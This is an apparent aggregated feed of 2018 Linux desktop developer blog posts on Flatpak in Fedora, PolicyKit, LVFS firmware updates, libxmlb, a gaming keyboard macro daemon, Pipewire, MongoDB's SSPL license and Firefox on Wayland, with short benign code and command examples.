Incidentally, if you know anyone at Microsoft who can provide me with the specs for their custom protocol, I'd appreciate it. We'd love to have support for it both in libratbag and in the kernel. Or any other vendor, come to think of it.

AMI joins the LVFS

Posted by Richard Hughes on December 07, 2018 11:49 AM

American Megatrends Inc. may not be a company you’ve heard of, unless perhaps you like reading early-boot BIOS messages. AMI is the world’s largest BIOS firmware vendor, supplying firmware and tools to customers such as Asus, Clevo, Intel, AMD and many others. If you’ve heard of a vendor using Aptio for firmware updates, that means it’s from them. AMI has been testing the LVFS, UpdateCapsule and fwupd for a few months and is now fully compatible. They are updating their whitepapers for customers explaining the process of generating a capsule, using the ESRT, and generating deliverables for the LVFS.

This means “LVFS Support” becomes a first class citizen alongside Windows Update for the motherboard manufacturers. This should trickle down to the resellers, so vendors using Clevo motherboards like Tuxedo get LVFS support almost for free. This will take a bit of time to trickle down to the smaller OEMs.

Also, expect another large vendor announcement soon. It’s the one quite a few people have been waiting for.

Flatpaks in Fedora – now live

Posted by Owen Taylor on December 04, 2018 07:42 PM

I’m pleased to announce that we now have full initial support for Flatpak creation in Fedora infrastructure: Flatpaks can be built as containers, pushed to testing and stable via Bodhi, and installed by users from registry.fedoraproject.org through the command line, GNOME Software, or KDE Discover.

The goal of this work has been to enable creating Flatpaks from Fedora packages on Fedora infrastructure – this will expand the set of Flatpaks that are available to all Flatpak users, provide a runtime that gets updates as bugs and security fixes appear in Fedora, and provide Fedora users, especially on Fedora Silverblue, with an out-of-the-box set of Flatpak applications enabled by default.

At a technical level, a very brief summary of the approach we’ve taken is to take Fedora RPMs, rebuild them with prefix=/app using the Fedora modularity framework, then, using the same container build service we use for server-side containers, create Flatpaks as OCI images. Flatpak has been extended to know how to browse, download, and install Flatpaks packaged as OCI images from a container registry. See my talk at DevConf.CZ last year for a slightly longer introduction to what we are doing.

Right now, there are only a few applications in the registry, but we will work to build up the set of applications over the next few months, and hopefully by the time that Fedora 30 comes out in the spring, we will have something that will be genuinely useful for Fedora users and that can be enabled by default in Fedora Workstation.

Special thanks to Clement Verna, Randy Barlow, Kevin Fenzi, and the rest of the Fedora infrastructure team for a lot of help in making the Fedora deployment happen, as well as to the OSBS team and Alex Larsson!

Using it

From the command line, either add the stable remote:

flatpak remote-add fedora oci+https://registry.fedoraproject.org

Or add the testing remote:

flatpak remote-add fedora-testing oci+https://registry.fedoraproject.org#testing

There is no point in adding both, since all Flatpaks in the stable remote are also in the testing remote. (The plan is that eventually most users will simply use the stable remote, and there will be links in Bodhi to make it easy to install a single application from testing.)

Note that some fixes were needed to make OCI remotes work properly system-wide. These were backported to the Fedora Flatpak-1.0.6 packages, but are only in master upstream, so if you aren’t using Fedora, you should add the remote per-user instead.
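Once the remote is added, installing and running an application works like with any other Flatpak remote, for example (the application ID below is just a placeholder):

flatpak install fedora org.example.App
flatpak run org.example.App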

Creating Flatpaks

If you are a Fedora packager and want to create a Flatpak of a graphical application you maintain, or want to help out creating Flatpaks in general, see the packager documentation. There is also a list of applications that are easy to package as Flatpaks.

Future work

One thing that should make things easier for packagers is the flatpak common module – by depending on this module, different Flatpaks can share the same binary builds of common libraries. This is particularly important for libraries that take a long time to build, or when an application needs to bundle a large set of libraries (think KDE or TeX). The current flatpak-common is a prototype, and there needs to be some thought given to the policies and tools for updating it.

Automatic rebuilds of Flatpaks are essential: when a fix is added to a library that an application bundles, the module and Flatpak should automatically be rebuilt without the maintainer of the Flatpak having to know that there was something to do – and then the maintainer should be notified, either with a link to a build failure, or, more hopefully, with a link to a Bodhi update that was automatically filed. Adding Flatpak support to Freshmaker and deploying it for Fedora is probably the right course here – though not a small task.

Another thing that I hope to address in the near term is signatures. Right now the authenticity is checked by downloading a master index from https://registry.fedoraproject.org that contains hashes for the latest versions of applications. But having signatures on the images would add further protection against tampering, and depending on how they were implemented, could allow things like third party signatures added by an organization’s IT department. There’s quite a bit of complexity here, because there are multiple competing signature frameworks to coordinate: not just Flatpak’s native signatures, but multiple different ways of signing container images.

A more long-term goal is to create a way to download updates to Flatpak container images as deltas, so that every update is not a full download. Reusing OCI images for Fedora Flatpaks has strong advantages for creating a common ecosystem between server applications and desktop applications, but on the server side, reducing bandwidth usage for server updates was usually not an important consideration, so the distribution strategy is simply to download everything from scratch. Hopefully work here could be shared between Flatpaks and the server usage of OCI images.

A PolicyKit refresher

Posted by Matthias Clasen on December 04, 2018 05:08 AM

PolicyKit has been around for a long time, and it is a mature system that basically does its job. I recently spent some time to improve the PolicyKit integration in Flatpak and thought it might be useful to write up some of the details.

Details, details

It is irritating when a dialog pops up unexpectedly and asks questions without providing sufficient details to really know where it is coming from and what the context is. Like this:

Authentication is required to install software

It would be much better to say what software is being installed, and where it is coming from:

PolicyKit lets you do this by using variables in your message and providing the replacement for them via a PolkitDetails object:

Authentication is required to install $(ref) from $(origin)

details = polkit_details_new ();
polkit_details_insert (details, "origin", origin);
polkit_details_insert (details, "ref", ref);

No display – no problem

It’s nice to get a PolicyKit dialog when you are using a desktop app that needs to carry out a privileged operation. But PolicyKit is also used by commandline tools, such as flatpak. If you are running a command in a terminal, a dialog might still be ok. But what if you are using flatpak on the console? A dialog is not available here, so privileged operations will fail.

PolicyKit provides the necessary plumbing to solve this situation, by letting apps register their own ‘agent’, which can handle authorization requests if no other agent is available. (In a graphical session, GNOME Shell provides an agent.)

Glancing over some details, the code to do this looks roughly like this:

listener = polkit_agent_text_listener_new (NULL, &error);
polkit_agent_listener_register (listener, flags, subject,
                                NULL, NULL, &error);

The text agent then prompts for authentication directly in the terminal. If PolicyKit’s built-in text agent does not fit your needs, you can implement a PolkitAgentListener yourself. That is what I ended up doing for Flatpak.

Psst, don’t interrupt

As I said earlier, unexpected dialogs are annoying. Ideally, PolicyKit dialogs should only ever appear in response to a direct user action. For example, a dialog is ok if I am clicking the “Install” button in GNOME Software, but not if GNOME Software decides on its own that it is time to install some updates.

PolicyKit has a means to achieve this, by not passing the

POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION

flag when checking for authorization. But this check happens in the system service (or mechanism, in PolicyKit lingo), not in your client. In order to take advantage of this flag, the client needs to pass information about user interaction along whenever it calls a privileged method of the mechanism.

In the Flatpak case, I added a ‘no-interaction’ flag to all the flatpak-system-helper methods, and library API that GNOME Software can use to set this flag for background operations.
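As a rough sketch (not the actual flatpak-system-helper code), the mechanism side can then map that flag onto the PolicyKit check; the action ID here is hypothetical and "sender" is the D-Bus caller:

/* hedged sketch: no_interaction is whatever the client passed along */
GError *error = NULL;
PolkitAuthority *authority = polkit_authority_get_sync (NULL, &error);
PolkitSubject *subject = polkit_system_bus_name_new (sender);
PolkitCheckAuthorizationFlags flags = no_interaction
    ? POLKIT_CHECK_AUTHORIZATION_FLAGS_NONE
    : POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION;
PolkitAuthorizationResult *result =
    polkit_authority_check_authorization_sync (authority, subject,
                                               "org.example.install-app",
                                               details /* the PolkitDetails from above, or NULL */,
                                               flags, NULL, &error);
if (result == NULL || !polkit_authorization_result_get_is_authorized (result))
    /* refuse the request instead of popping up a dialog */;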

So there should be fewer unexpected PolicyKit dialogs in the future.

Update: A useful PolicyKit feature that I forgot to mention is implications. If the permissions (or actions, in PolicyKit lingo) are ordered in some way (e.g. if you are allowed to install applications, you should also be allowed to update them), you can express these relations with “imply” annotations. This can further reduce the need for duplicate dialogs.

ggkbdd is a generic gaming keyboard daemon

Posted by Peter Hutterer on December 03, 2018 05:43 AM

Last week while reviewing a patch I read that some gaming keyboards have two modes - keyboard mode and gaming mode. When in gaming mode, the keys send out pre-recorded macros when pressed. Presumably (I am not a gamer) this is to record keyboard shortcuts to have quicker access to various functionalities. The macros are stored in the hardware and are thus relatively independent of the host system, provided you have access to the custom protocol, which you probably don't when you're on Linux. But I digress.

I reckoned this could be done in software and work with any 5 dollar USB keyboard. A few hours later, I have this working now: ggkbdd. It sits directly above the kernel and waits for key events. Once the 'mode key' is hit, the keyboard will send pre-configured key sequences for the respective keys. Hitting the mode key again (or ESC) switches back to normal mode.
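To give an idea of the mechanics, here is a hedged sketch (not ggkbdd's actual code) of replaying a macro through uinput once the mode key has been seen; device creation via UI_DEV_SETUP/UI_DEV_CREATE is assumed to have happened elsewhere:

#include <linux/uinput.h>
#include <string.h>
#include <unistd.h>

/* write a single synthetic event to the uinput device */
static void emit (int uinput_fd, int type, int code, int value)
{
    struct input_event ev;
    memset (&ev, 0, sizeof ev);
    ev.type = type;
    ev.code = code;
    ev.value = value;
    write (uinput_fd, &ev, sizeof ev);
}

/* press and release each key of the pre-configured macro in order */
static void send_macro (int uinput_fd, const int *keys, int n_keys)
{
    for (int i = 0; i < n_keys; i++) {
        emit (uinput_fd, EV_KEY, keys[i], 1);
        emit (uinput_fd, EV_KEY, keys[i], 0);
        emit (uinput_fd, EV_SYN, SYN_REPORT, 0);
    }
}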

There's a lot of functionality that is missing such as integration with the desktop (probably via DBus), better security (dropping privs, masking the fd to avoid accidental key logging), better system integration (request fds from logind, possibly through the compositor). And error handling, etc. I think the total time spent on this is somewhere between 3 and 4h, and that includes the time to write this blog post and debug the systemd unit autostartup. There are likely other projects that solve it the same way, or at least in a similar manner. I didn't check.

This was done as proof-of-concept and

  • I don't know if it's useful and if so, what the use-cases are
  • I don't know if I will have any time to fix things on this
  • I don't know if other (better developed) projects already occupy that space
In the grand glorious future and provided this is indeed something generally useful, this would need compositor integration. Not sure we'll ever get to that point. Meanwhile, consider this a code drop for a proof-of-concept and expect that you'll have to fix any bugs yourself.

An update on Flatpak updates

Posted by Matthias Clasen on November 26, 2018 11:10 PM

A while ago, I described how to handle restarting Flatpak apps when they are updated.

While I showed working code back then, the example was a bit contrived, since it had to work around GApplication’s built-in uniqueness features.

With the just-landed support for replacement in GApplication, this is now much more straightforward, and I’ve updated my example to show how it works.

Restart yourself

There are a few steps to this.

First, we need to opt into allowing replacement by passing G_APPLICATION_ALLOW_REPLACEMENT when creating our GApplication:

app = g_object_new (portal_test_app_get_type (),
        "application-id", "org.gnome.PortalTest",
        "flags", G_APPLICATION_ALLOW_REPLACEMENT,
        NULL);

This flag makes GApplication handle a --gapplication-replace commandline option, which we will see in action later.

Next, we monitor the /app/.updated file. Flatpak creates this file inside a running sandbox when a new version of the app is available, so this is our signal to restart ourselves:

file = g_file_new_for_path ("/app/.updated");
update_monitor =
       g_file_monitor_file (file, 0, NULL, NULL);
g_signal_connect (update_monitor, "changed",
       G_CALLBACK (update_monitor_changed), win);

The update_monitor_changed function presents a dialog that offers the user the option to restart the app:

 if (response == GTK_RESPONSE_OK)
      portal_test_app_restart (app);

The portal_test_app_restart function is where we take advantage of the new GApplication functionality:

const char *argv[3] = {
    "/app/bin/portal-test",
    "--gapplication-replace",
    NULL
};

xdp_flatpak_call_spawn (flatpak, cwd, argv, ...);

We call the Spawn method of the Flatpak portal, passing --gapplication-replace as a commandline option, and everything else is handled for us. Easy!

Update 1: If D-Bus is not your thing, there is a simple commandline tool called flatpak-spawn that can be used for the same purpose. It is available inside the sandbox.
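For the example above, the equivalent call from inside the sandbox would look roughly like this (a sketch; check flatpak-spawn --help for the exact options):

flatpak-spawn /app/bin/portal-test --gapplication-replace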

Update 2: I forgot to mention that GApplication has also gained a name-lost signal. It can be used to save state in the old instance that can then be loaded in the new instance.
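A minimal sketch of what that could look like, assuming a hypothetical save_state() helper:

static gboolean
on_name_lost (GApplication *app, gpointer user_data)
{
  save_state ();             /* hypothetical helper: persist state for the new instance */
  g_application_quit (app);
  return TRUE;
}

g_signal_connect (app, "name-lost", G_CALLBACK (on_name_lost), NULL);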

Adding an optional install duration to LVFS firmware

Posted by Richard Hughes on November 13, 2018 09:54 AM

We’ve just added an optional feature to fwupd and the LVFS that some people might find useful: The firmware update process can now tell the user how long in seconds the update is going to take.

This means that users can know that a dock update might take 5 minutes, and so they start the update process before they go to lunch. A UEFI update will require multiple reboots and will take 45 minutes to apply, and so the user will only apply the update at the end of the day rather than losing access to their computer for nearly an hour.

If you want to use this feature there are currently three ways to assign the duration to the update:

  • Changing the value on the LVFS admin console — the component update panel now has an extra input field to enter the duration in seconds
  • Adding a new install_duration attribute to the <release> element, for instance:
    <release version="3.0.2" date="2018-11-09" install_duration="120">
    
  • Adding a ‘quirk’ to fwupd, for instance:
    [DeviceInstanceId=USB\VID_1234&PID_5678]
    InstallDuration = 40
    
For updates requiring a reboot the install duration should include the time to POST the system both before and after the update has run, but it can be approximate. Only users running very new versions of fwupd and gnome-software will be shown the install duration, and older versions will be unchanged as the new property will just be ignored. It’s therefore safe to include in all versions of firmware without adding a dependency on a specific fwupd version.

More fun with libxmlb

Posted by Richard Hughes on November 12, 2018 03:49 PM

A few days ago I cut the 0.1.4 release of libxmlb, which is significant because it includes the last three features I needed in gnome-software to achieve the same search results as appstream-glib.

The first is something most users of database libraries will be familiar with: Bound variables. The idea is you prepare a query which is parsed into opcodes, and then at a later time you assign one of the ? opcode values to an actual integer or string. This is much faster as you do not have to re-parse the predicate, and also means you avoid failing in incomprehensible ways if the user searches for nonsense like ]@attr. Borrowing from SQL, the syntax should be familiar:

g_autoptr(XbQuery) query = xb_query_new (silo, "components/component/id[text()=?]/..", &error);
xb_query_bind_str (query, 0, "gimp.desktop", &error);
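To actually run the prepared query you hand it back to the silo. A minimal sketch, assuming the xb_silo_query_full() entry point behaves as in current libxmlb (treat the exact names here as an assumption):

/* assumption: xb_silo_query_full() returns a GPtrArray of XbNode results */
g_autoptr(GPtrArray) results = xb_silo_query_full (silo, query, &error);
for (guint i = 0; results != NULL && i < results->len; i++) {
    XbNode *n = g_ptr_array_index (results, i);
    g_print ("%s\n", xb_node_get_element (n)); /* here: the matching <component> */
}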

The second feature makes the caller jump through some hoops, but hoops that make things faster: Indexed queries. As might be apparent to some, libxmlb stores all the text in a big deduplicated string table after the tree structure is defined. That means if you do <component component="component">component</component> then we only store one string! When we actually set up an object to check a specific node for a predicate (for instance, text()='fubar') we actually do strcmp("fubar", "component") internally, which in most cases is very fast…

Unless you do it 10 million times…

Using indexed strings tells the XbMachine processing the predicate to first check if fubar exists in the string table, and if it doesn’t, the predicate can’t possibly match and is skipped. If it does exist, we know the integer position in the string table, and so when we compare the strings we can just check two uint32_t’s which is quite a lot faster, especially on ARM for some reason. In the case of fwupd, it is searching for a specific GUID when returning hardware results. Using an indexed query takes the per-device query time from 3.17ms to about 0.33ms – which if you have a large number of connected updatable devices makes a big difference to the user experience. As using the indexed queries can have a negative impact and requires extra code it is probably only useful in a handful of cases. In case you do need this feature, this is the code you would use:

xb_silo_query_build_index (silo, "component/id", NULL, &error); // the cdata
xb_silo_query_build_index (silo, "component", "type", &error); // the @type attr
g_autoptr(XbNode) n = xb_silo_query_first (silo, "component/id[text()=$'test.firmware']", &error);

Indexed lookups are denoted by $'' rather than the normal pair of single quotes. If there is something more standard to denote this kind of thing, please let me know and I’ll switch to that instead.

The third feature is: Stemming; which means you can search for “gaming mouse” and still get results that mention games, game and Gaming. This is also how you can search for words like Kongreßstraße which matches kongressstrasse. In an ideal world stemming would be computationally free, but if we are comparing millions of records each call to libstemmer sure adds up. Adding the stem() XPath operator took a few minutes, but making it usable took up a whole weekend.

The query we wanted to run would be of the form id[text()~=stem('?')] but the stem() would be called millions of times on the very same string for each comparison. To fix this, and to make other XPath operators faster I implemented an opcode rewriting optimisation pass to the XbMachine parser. This means if you call lower-case(text())==lower-case('GIMP.DESKTOP') we only call the UTF-8 strlower function N+1 times, rather than 2N times. For lower-case() the performance increase is slight, but for stem it actually makes the feature usable in gnome-software. The opcode rewriting optimisation pass is kinda dumb in how it works (“lets try all combinations!”), but works with all of the registered methods, and makes all existing queries faster for almost free.

One common question I’ve had is if libxmlb is supposed to obsolete appstream-glib, and the answer is “it depends”. If you’re creating or building AppStream metadata, or performing any AppStream-specific validation then stick to the appstream-glib or appstream-builder libraries. If you just want to read AppStream metadata you can use either, but if you can stomach a binary blob of rewritten metadata stored somewhere, libxmlb is going to be a couple of orders of magnitude faster and use a ton less memory.

If you’re thinking of using libxmlb in your project send me an email and I’m happy to add more documentation where required. At the moment libxmlb does everything I need for fwupd and gnome-software and so apart from bugfixes I think it’s basically “done”, which should make my manager somewhat happier. Comments welcome.

Pipewire Hackfest 2018

Posted by Bastien Nocera on October 31, 2018 11:44 AM
Good morning from Edinburgh, where the breakfast contains haggis, and the charity shops have some interesting finds.

My main goal in attending this hackfest was to discuss Pipewire integration in the desktop, and how it will eventually replace PulseAudio as the audio daemon.

The main problems GNOME has had over the years with PulseAudio relate mostly to how PulseAudio was a black box when it came to its routing policy. What happens when you plug an HDMI cable into your laptop? Or turn on your Bluetooth headset? I've heard the stories of folks with highly mobile workstations having to constantly visit the Sound settings panel.

PulseAudio has policy scattered in a number of places (do a "git grep routing" inside the sources to see that): some are in the device manager, then modules themselves can set priorities for their outputs and inputs. But there's nothing to take all the information in, and take a decision based on the hardware that's plugged in, and the applications currently in use.

For Pipewire, the policy decisions would be split off from the main daemon. Pipewire, as it gains PulseAudio compatibility layers, will grow a default/example policy engine that will try to replicate PulseAudio's behaviour. At the very least, that will mean that Pipewire won't regress compared to PulseAudio, and might even be able to take better decisions in the short term.

For GNOME, we still wanted to take control of that part of the experience, and make our own policy decisions. It's very possible that this engine will end up being featureful and generic enough that it will be used by more than just GNOME, or even become the default Pipewire one, but it's far too early to make that particular decision.

In the meanwhile, we wanted the GNOME policies to not be written in C, which is difficult to experiment with, both for power users and for edge use cases. We could have started writing a configuration language, but it would have been too specific, and there are plenty of embeddable languages around. It was also a good opportunity for me to finally write the helper library I've been meaning to write for years, based on my favourite embedded language, Lua.

So I'm introducing Anatole. The goal of the project is to make it trivial to write chunks of programs in Lua, while the core of your project is written in C (we might even be able to embed it in Python or Javascript, once introspection support is added).

It's still in the very early days, and unusable for anything as of yet, but progress should be pretty swift. The code is mostly based on Victor Toso's incredible "Lua factory" plugin in Grilo. (I'm hoping that, once finished, I won't have to remember on which end of the stack I need to push stuff for Lua to do something with it ;)

Using the LVFS to influence procurement decisions

Posted by Richard Hughes on October 30, 2018 12:41 PM

The National Cyber Security Centre (part of GCHQ, the UK version of the NSA) wrote a nice article on using the LVFS to influence procurement decisions. It’s probably also worth noting that the two biggest OEMs making consumer hardware require all their ODMs to also support firmware updates on the LVFS. More and more mega-corporations also have “supports the LVFS” as a requirement for procurement.

The LVFS is slowly and carefully moving to the Linux Foundation, so expect more outreach and announcements soon.

libxmlb now a dependency of fwupd and gnome-software

Posted by Richard Hughes on October 22, 2018 07:31 AM

I’ve just released libxmlb 0.1.3, and merged the branches for fwupd and gnome-software so that it becomes a hard dependency of both projects. A few people have reviewed the libxmlb code, and Mario, Kalev and Robert reviewed the fwupd and gnome-software changes so I’m pretty confident I’ve not broken anything too important — but more testing very welcome. GNOME Software RSS usage is about 50% of what is shipped in 3.30.x and fwupd is down by 65%! If you want to ship the upcoming fwupd 1.2.0 or gnome-software 3.31.2 in your distro you’ll need to have libxmlb packaged, or be happy using a Meson subproject to download libxmlb during the build of each dependent project.

Initial thoughts on MongoDB's new Server Side Public License

Posted by Matthew Garrett on October 16, 2018 10:43 PM
MongoDB just announced that they were relicensing under their new Server Side Public License. This is basically the Affero GPL except with section 13 largely replaced with new text, as follows:

If you make the functionality of the Program or a modified version available to third parties as a service, you must make the Service Source Code available via network download to everyone at no charge, under the terms of this License. Making the functionality of the Program or modified version available to third parties as a service includes, without limitation, enabling third parties to interact with the functionality of the Program or modified version remotely through a computer network, offering a service the value of which entirely or primarily derives from the value of the Program or modified version, or offering a service that accomplishes for users the primary purpose of the Software or modified version.

“Service Source Code” means the Corresponding Source for the Program or the modified version, and the Corresponding Source for all programs that you use to make the Program or modified version available as a service, including, without limitation, management software, user interfaces, application program interfaces, automation software, monitoring software, backup software, storage software and hosting software, all such that a user could run an instance of the service using the Service Source Code you make available.


MongoDB admit that this license is not currently open source in the sense of being approved by the Open Source Initiative, but say: “We believe that the SSPL meets the standards for an open source license and are working to have it approved by the OSI.”

At the broadest level, AGPL requires you to distribute the source code to the AGPLed work[1] while the SSPL requires you to distribute the source code to everything involved in providing the service. Having a license place requirements around things that aren't derived works of the covered code is unusual but not entirely unheard of - the GPL requires you to provide build scripts even if they're not strictly derived works, and you could probably make an argument that the anti-Tivoisation provisions of GPL3 fall into this category.

A stranger point is that you're required to provide all of this under the terms of the SSPL. If you have any code in your stack that can't be released under those terms then it's literally impossible for you to comply with this license. I'm not a lawyer, so I'll leave it up to them to figure out whether this means you're now only allowed to deploy MongoDB on BSD because the license would require you to relicense Linux away from the GPL. This feels sloppy rather than deliberate, but if it is deliberate then it's a massively greater reach than any existing copyleft license.

You can definitely make arguments that this is just a maximalist copyleft license, the AGPL taken to extreme, and therefore it fits the open source criteria. But there's a point where something is so far from the previously accepted scenarios that it's actually something different, and should be examined as a new category rather than already approved categories. I suspect that this license has been written to conform to a strict reading of the Open Source Definition, and that any attempt by OSI to declare it as not being open source will receive pushback. But definitions don't exist to be weaponised against the communities that they seek to protect, and a license that has overly onerous terms should be rejected even if that means changing the definition.

In general I am strongly in favour of licenses ensuring that users have the freedom to take advantage of modifications that people have made to free software, and I'm a fan of the AGPL. But my initial feeling is that this license is a deliberate attempt to make it practically impossible to take advantage of the freedoms that the license nominally grants, and this impression is strengthened by it being something that's been announced with immediate effect rather than something that's been developed with community input. I think there's a bunch of worthwhile discussion to have about whether the AGPL is strong and clear enough to achieve its goals, but I don't think that this SSPL is the answer to that - and I lean towards thinking that it's not a good faith attempt to produce a usable open source license.

(It should go without saying that this is my personal opinion as a member of the free software community, and not that of my employer)

[1] There's some complexities around GPL3 code that's incorporated into the AGPLed work, but if it's not part of the AGPLed work then it's not covered


Firefox on Wayland update

Posted by Martin Stransky on October 09, 2018 09:38 AM

As a next step in the Wayland effort we have new fresh Firefox packages [1] with all the goodies from Firefox 63/64 (Nightly) for you. They come with better (and fixed) rendering, v-sync support, and working HiDPI. Support for hi-res displays is not perfect yet and more fixes are on the way – thanks to Jan Horak who wrote those patches.

The builds also ship the PipeWire WebRTC patch for desktop sharing created by Jan Grulich and Tomas Popela. Wayland applications are isolated from the desktop and don’t have access to other windows (as they have on X11), so PipeWire supplies the missing functionality alongside the browser sandbox.

I think the rendering is generally covered now and the browser should work smoothly with the Wayland backend. That’s also a reason why I made it the default on Fedora 30 (Rawhide), where the firefox-x11 package is available as an X11 fallback. Fedora 29 and earlier stay with the default X11 backend and Wayland is provided by the firefox-wayland package.

And there’s surely some work left to make Firefox perfect on Wayland – for instance correctly placing popups on GTK 3.24, updating WebRender/EGL, fixing the KDE compositor, and so on.

[1] Fedora 27 Fedora 28 Fedora 29

Flatpak, after 1.0

Posted by Matthias Clasen on October 08, 2018 05:45 PM

Flatpak 1.0 has happened a while ago, and we now have a stable base. We’re up to the 1.0.3 bug-fix release at this point, and hope to get 1.0.x adopted in all major distros before too long.

Does that mean that Flatpak is done? Far from it! We have just created a stable branch and started landing some queued-up feature work on the master branch. This includes things like:

  • Better life-cycle control with ps and kill commands
  • Logging and history
  • File copy-paste and DND
  • A better testsuite, including coverage reports

Beyond these, we have a laundry list of things we want to work on in the near future, including

  • Using host GL drivers (possibly with libcapsule)
  • Application renaming and end-of-life migration
  • A portal for dconf/gsettings (a stopgap measure until we have D-Bus container support)
  • A portal for webcam access
  • More tests!

We are also looking at improving the scalability of the flathub infrastructure. The repository has grown to more than 400 apps, and buildbot is not really meant to be used the way we use it.

What about releases?

We have not set a strict schedule, but the consensus seems to be that we are aiming for roughly quarterly releases, with more frequent devel snapshots as needed. Looking at the calendar, that would mean we should expect a stable 1.2 release around the end of the year.

Open for contribution

One of the easiest ways to help Flatpak is to get your favorite applications on flathub, either by packaging them yourself, or by convincing the upstream to do it.

If you feel like contributing to Flatpak itself, please do! Flatpak is still a young project, and there are plenty of small to medium-size features that can be added. The tests are also a nice place to stick your toe in and see if you can improve the coverage a bit and maybe find a bug or two.

Or, if that is more your thing, we have a nice design for improving the flatpak commandline user experience that is waiting to be implemented.

Announcing the first release of libxmlb

Posted by Richard Hughes on October 04, 2018 06:36 PM

Today I did the first 0.1.0 preview release of libxmlb. We’re at the “probably API stable, but no promises” stage. This is the library I introduced a couple of weeks ago, and since then I’ve been porting both fwupd and gnome-software to use it. The former is almost complete, and nearly ready to merge, but the latter is still work in progress with a fair bit of code to write. I did manage to launch gnome-software with libxmlb yesterday, and modulo a bit of brokenness it’s both faster to start (over 800ms faster from cold boot!) and uses an amazing 90Mb less RSS at runtime. I’m planning to merge the libxmlb branch into the unstable branch of fwupd in the next few weeks, so I need volunteers to package up the new hard dep for Debian, Ubuntu and Arch.

The tarball is in the usual place – it’s a simple Meson-built library that doesn’t do anything crazy. I’ve imported and built it already for Fedora, much thanks to Kalev for the super speedy package review.

I guess I should explain how applications are expected to use this library. At its core, there are just five different kinds of objects you need to care about:

  • XbSilo – a deduplicated string pool and a read only node tree. This is typically kept alive for the application lifetime.
  • XbNode – a “Gobject wrapped” immutable node available as a query result from XbSilo.
  • XbBuilder – a “compiler” to build the XbSilo from XbBuilderNode’s or XbBuilderSource’s. This is typically created and destroyed at startup or when the blob needs regenerating.
  • XbBuilderNode – a mutable node that can have a parent, children, attributes and a value
  • XbBuilderSource – a source of data for XbBuilder, e.g. a .xml.gz file or just a raw XML string

The way most applications will use libxmlb is to create a local XbBuilder instance, add some XbBuilderSource’s and then “ensure” a local cache file. The “ensure” process either mmap loads the binary blob if all the file mtimes are the same, or compiles a blob saving it to a new file. You can also tell the XbSilo to watch all the sources that it was built with, so that if any files change at runtime the valid property gets set to FALSE and the application can xb_builder_ensure() at a convenient time.
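As a rough sketch of that flow, using current libxmlb API names which may differ slightly from this 0.1.0 release (the file paths are placeholders):

g_autoptr(GError) error = NULL;
g_autoptr(XbBuilder) builder = xb_builder_new ();
g_autoptr(XbBuilderSource) source = xb_builder_source_new ();
g_autoptr(GFile) xml = g_file_new_for_path ("/usr/share/metainfo/org.example.App.metainfo.xml");
g_autoptr(GFile) blob = g_file_new_for_path ("/var/cache/example/components.xmlb");

if (!xb_builder_source_load_file (source, xml, XB_BUILDER_SOURCE_FLAG_NONE, NULL, &error))
    g_error ("failed to load source: %s", error->message);
xb_builder_import_source (builder, source);

/* mmap()s the existing blob if the source mtimes are unchanged, otherwise recompiles it */
g_autoptr(XbSilo) silo = xb_builder_ensure (builder, blob, XB_BUILDER_COMPILE_FLAG_NONE, NULL, &error);

g_autoptr(XbNode) id = xb_silo_query_first (silo,
    "components/component/id[text()='gimp.desktop']", &error);
if (id != NULL)
    g_print ("found %s\n", xb_node_get_text (id));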

Once the XbBuilder has been compiled, a XbSilo pops out. With the XbSilo you can query using most common XPath statements – I actually ended up implementing a FORTH-style stack interpreter so we can now do queries like /components/component/id[contains(upper-case(text()),'GIMP')] – I’ll say a bit more on that in a minute. Queries can limit the number of results (for speed), and are deduplicated in a sane way so it’s really quite a simple process to achieve something that would be a lot of C code. It’s possible to directly query an attribute or text value from a node, so the silo doesn’t have to be passed around either.

In the process of porting gnome-software, I had to make libxmlb thread-safe – which required some internal organisation. We now have a non-exported XbMachine stack interpreter, and then the XbSilo actually registers the XML-specific methods (like contains()) and functions (like ~=). These get passed some per-method user data, and also some per-query private data that is shared with the node tree – allowing things like [last()] and position()=3 to work. The function callbacks just get passed a query-specific stack, which means you can allow things like comparing "1" to 1.00f. This makes it easy to support more of XPath in the future, or to support something completely application specific like gnome-software-search() without editing the library.

If anyone wants to do any API or code review I’d be super happy to answer any questions. Coverity and valgrind seem happy enough with all the self tests, but that’s no replacement for a human asking tricky questions. Thanks!

Speeding up AppStream: mmap’ing XML using libxmlb

Posted by Richard Hughes on September 20, 2018 09:27 AM

AppStream and the related AppData are XML formats that have been adopted by thousands of upstream projects and are being used in about a dozen different client programs. The AppStream metadata shipped in Fedora is currently a huge 13Mb XML file, which with gzip compresses down to a more reasonable 3.6Mb. AppStream is awesome; it provides translations of lots of useful data into basically all languages and includes screenshots for almost everything. GNOME Software is built around AppStream, and we even use a slightly extended version of the same XML format to ship firmware update metadata from the LVFS to fwupd.

XML does have two giant weaknesses. The first is that you have to decompress and then parse the files – which might include all the ~300 tiny AppData files as well as the distro-provided AppStream files, if you want to list installed applications not provided by the distro. Seeking lots of small files isn’t so slow on an SSD, and loading+decompressing a small file is actually quicker than loading an uncompressed larger file. Parsing an XML file typically means you set up some callbacks, which then get called for every start tag, text section, then end tag – so for a 13Mb XML document that’s nested very deeply you have to do a lot of callbacks. This means you have to process the description of GIMP in every language before you can even see if Shotwell exists at all.

The typical way of parsing XML involves creating a “node tree”. This allows you to treat the XML document as a Document Object Model (DOM), which allows you to navigate the tree and parse the contents in an object oriented way. This means you typically allocate on the heap the nodes themselves, plus copies of all the string data. AsNode in libappstream-glib has a few tricks to reduce RSS usage after parsing, which includes:

  • Interning common element names like description, p, ul, li
  • Freeing all the nodes, but retaining all the node data
  • Ignoring node data for languages you don’t understand
  • Reference counting the strings from the nodes into the various appstream-glib GObjects

This still has both drawbacks: we need to store in hot memory all the screenshot URLs of all the apps you’re never going to search for, and we also need to parse all the long translated description data just to find out if gimp.desktop is actually installable. Deduplicating strings at runtime takes nontrivial amounts of CPU and means we build a huge hash table that uses nearly as much RSS as we save by deduplicating.

On a modern system, parsing ~300 files takes less than a second, and the total RSS is only a few tens of Mb – which is fine, right? Except on resource constrained machines it takes 20+ seconds to start, and 40Mb is nearly 10% of the total memory available on the system. We have exactly the same problem with fwupd, where we get one giant file from the LVFS, all of which gets stored in RSS even though you never have the hardware that it matches against. Slow starting of fwupd and gnome-software is one of the reasons they stay resident, and don’t shutdown on idle and restart when required.

We can do better.

